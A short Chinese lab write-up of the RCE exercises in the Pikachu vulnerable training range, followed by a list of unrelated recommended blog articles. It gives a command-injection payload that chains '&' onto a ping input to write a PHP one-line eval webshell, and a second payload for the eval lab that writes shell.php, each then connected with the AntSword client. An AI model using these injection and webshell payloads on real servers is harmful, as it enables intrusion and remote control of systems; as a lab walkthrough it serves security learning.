Pikachu靶场之RCE漏洞详解

一.exec "ping"

1.ping本机127.0.0.1

2.用&符拼接dir查看目录

3.&拼接echo输入一句话木马

127.0.0.1&echo "<?php @eval($_POST[cmd]);?>)" > 6.php

4.同级目录访问6.php,蚁剑连接

二:exec "eval"

1.后台使用了eval()函数,直接输入phpinfo();

2.写入一句话木马,访问shell.php

fputs(fopen('shell.php','w'),'<?php eval($_POST["cmd"])?>');

3.蚁剑连接

相关推荐
flex88881 分钟前
一个专为 Windows 用户设计的配置文件集合提供类似 Unix 环境的美化和功能增强。
服务器·windows·unix
派葛穆1 小时前
网络-MOXA设备基本操作
运维·网络
Clownseven1 小时前
[服务器备份教程] Rclone实战:自动备份数据到阿里云OSS/腾讯云COS等对象存储
服务器·阿里云·腾讯云
EasyDSS1 小时前
国标GB28181视频平台EasyGBS校园监控方案:多场景应用筑牢安全防线,提升管理效能
网络·人工智能·安全
群联云防护小杜1 小时前
物联网僵尸网络防御:从设备认证到流量染色
运维·服务器·前端·网络·物联网·安全·ddos
Zero two and hiro1 小时前
tomcat一闪而过,按任意键继续以及控制台中文乱码问题
java·服务器·tomcat
Web极客码1 小时前
WordPress搜索引擎优化的最佳重定向插件:入门指南
运维·服务器·前端
中国lanwp2 小时前
在Maven中替换文件内容的插件和方法
服务器·数据库·maven
白初&3 小时前
CVE-2015-4553 Dedecms远程写文件
安全
Kendra9193 小时前
Docker 运维管理
运维·docker·容器